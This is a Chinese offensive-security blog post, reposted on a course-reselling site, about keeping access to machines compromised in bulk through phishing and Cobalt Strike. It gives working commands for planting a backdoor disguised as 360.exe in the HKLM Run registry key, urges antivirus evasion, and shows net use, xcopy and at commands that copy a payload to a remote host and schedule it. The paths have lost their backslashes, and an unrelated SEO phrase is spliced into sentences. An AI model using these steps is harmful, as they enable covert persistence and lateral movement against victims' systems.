win7管理员权限怎么获取-CobalStrike批量上线后的权限维持和信息收集~

出品｜MS08067实验室

本文作者：BlackCat（Ms08067内网安全小组成员）

BlackCat微信（欢迎骚扰交流）：

前言：

昨天做CS批量上线的时候发现，内网渗透的本质都是信息收集，也就是收集各种账号密码，一旦有了密码，这个系统也就不攻而破了。然后就在网上以及查阅资料中，整理了以下的搜集姿势。

权限维持：

比如通过钓鱼邮件，批量获取了一批上线机器，但是我们不能第上来就进行其他主机的渗透，第一步应 该进行维稳加固。

维稳方法一：加入出册表自启动

之所以放入注册表中，是由于我们后期的操作可能需要一个正常用户权限的shell,因为有些操作必须在对应的用户权限下才能正常进行，比如wmi,schtasks,net user,截屏，键盘记录等等。。

在网上翻阅了一大堆的关于这个方法的资料

参考链接：

网上大佬的脚本方法我没能实验成功，就算成功了，上传会不会被杀也不一定，所以我选择了最保守的 方法利用beacon执行cmd的命令来修改注册表：

这里用到了reg命令：eg命令是Windows提供的，它可以添加、更改和显示注册表项中的注册表子项信息和值。

首先我们要知道，注册表里开机自启动的目录是什么：

Win+R执行regedit后依次打开以下目录

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

这样就能看到开机自启动的内容都有什么:

这个在cmd中的命令为

REG query “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun#显示这个目录下的所有的值

在beacon中执行就是前面加个shell

可以看到成功执行：然后下一步就是添加我们的后门程序到这个目录下，个人经验，感觉这里尽量稍稍 伪装一下自己的后门程序名，有的管理员安全意识高的可能会查看，这里我把它改为360.exe

然后通过文件浏览器，把这个后门上传上去，但是一定要做好免杀，这里我上传到了 “C:WindowsTemp”目录下：

语法为：

reg add “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionrun” /v【启bai动名】/d “【启动路径】”/f替换

上面这个会对所有用户生效win7管理员权限怎么获取，如果只想对当前用户生效，把HKEY_LOCAL_MACHINE改为 HKEY_CURRENT_USER 就可以了。

REG add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v 360 /d “C:WindowsTemp360.exe” /f

然后在beacon中执行：

然后去被控机上面看是否生效:

成功了 。。还有⼀条删除命令：

REG delete “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v 360 /f #删除360这个进程

最后我先在cs上下了这台机器，然后重启了下这台机器win7管理员权限怎么获取，重启后发现cs直接上线，所以这步我们就此告—段落。

REG query”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”#显示这个目录下的所有的值REG add”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”/v360/d”C:WindowsTemp360.exe” /f #把上传的后门程序设置成开机自启动REG delete”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”/v 360/f #删除自启动

维稳方法二：加入高权限组执行计划任务

一般情况下我们获取的CS后门权限都是administrator的，

但是我们后期要弹system的shell时候，或者和域内DC机通讯的话，还是需要system权限的。最简单的提权

执行完后会新上线一台机器权限为system，提权成功。

但是慢慢发现，有的时候，system权限并虽然高，但是感觉还是不适合我们操作，有些命令还是administrator权限执行可以，比如wmi,schtasks,netuse r,截屏，键盘记录等

这里就在继续说一下

维稳方法三：Windows的计划任务（schtasks）

简介：

计划任务，顾名思义，指定时间做指定的事情，对windows来说可能是执行脚本，也可能是exe。计划任务的利用不仅仅在横向渗透中，也可以是在权限维持。

利用前提:

1.必须通过其他手段拿到本地或者域管理账号密码

2.若在横向渗透过程中，要保证当前机器能netuse远程到目标机器上

3.目标机器开启了taskscheduler服务

测试：

对于XP或者2003以下的机器，基本都是用at来管理本地或者远程机器上的计划任务。这里没有搭建03的机器，就简单的列一下命令，解释一下。

ne tuse \192.168.1.101admin$ /user:”administrator” admin #netuse 连接

net time \192.168.1.101 #查看远程主机时间

xcopyc:payload.exe \192.168.1.101admin$temp

# 拷贝payload至0远程主机对应目录下

at\192.168.1.10119:30 /every:5,10,15,20,25,30c:windowstemppayload.exe

#设定计划任务，每月5,10,15,20,25,30日的19:30执行命令运行payload

———END———
限 时 特 惠： 本站每日持续更新海量各大内部创业教程，一年会员只需98元，全站资源免费下载 点击网站首页每天更新
站 长 微 信： aiwo51889